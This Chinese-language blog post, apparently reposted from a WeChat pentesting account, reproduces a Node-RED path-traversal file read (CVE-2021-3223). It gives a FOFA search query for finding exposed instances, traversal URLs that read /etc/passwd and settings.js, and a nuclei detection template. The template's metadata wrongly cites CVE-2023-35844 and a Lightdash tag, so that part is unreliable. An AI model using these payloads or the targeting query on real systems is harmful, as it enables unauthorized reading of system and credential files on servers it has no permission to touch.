Node-RED任意文件读取漏洞 (CVE-2021-3223)

2024年3月8日12:53:12评论18 views字数 855阅读2分51秒阅读模式

一、免责声明：

本次文章仅限个人学习使用，如有非法用途均与作者无关，且行且珍惜；由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除整改并向您致以歉意。谢谢！

二、产品介绍：

Node-RED任意文件读取漏洞 (CVE-2021-3223)

三、资产梳理：

fofa：title="Node-RED"

四、漏洞复现：

http://target/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

Node-RED任意文件读取漏洞 (CVE-2021-3223)

http://target/ui_base/js/..%2f..%2f..%2f..%2fsettings.js

Node-RED任意文件读取漏洞 (CVE-2021-3223)

五、POC：

nuclei：

id: node_red_filesReadinfo:  name: node_red_filesRead  author: joyboy  severity: critical  description: http://xxx.xxx.xxx/ui_base/js/..%2f..%2f..%2f..%2fsettings.js  metadata:    max-request: 1    fofa-query: title="Node-RED"    verified: true    CVE: CVE-2023-35844  tags: readfile,Lightdash,cve,cve2023requests:  - method: GET    path:      - "{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"    matchers-condition: and    matchers:      - type: status        status:          - 200      - type: word        words:          - 'root:'

Node-RED任意文件读取漏洞 (CVE-2021-3223)

原文始发于微信公众号（fly的渗透学习笔记）：Node-RED任意文件读取漏洞 (CVE-2021-3223)

左青龙
微信扫一扫

右白虎
微信扫一扫

Node-RED任意文件读取漏洞 (CVE-2021-3223)

douphp代码执行漏洞

Apache Tomcat输入验证错误漏洞（CVE-2024-24549）

海康威视运行管理中心远程命令执行漏洞(fastjson)

大华智慧园区综合管理平台 pay 远程代码执行

开源数据大屏AJ-Report存在远程命令执行漏洞

瑞友天翼应用虚拟化系统index.php接口处存在SQL注入漏洞导致RCE

【0day】瑞友天翼应用虚拟化系统appsave存在SQL注入漏洞-复现

漏洞复现 | MetaCRM客户关系管理系统-任意文件上传漏洞【附poc】

电信网关配置管理系统存在弱口令

【漏洞复现】挂号系统-login-sql注入漏洞复现

发表评论

在线咨询

微信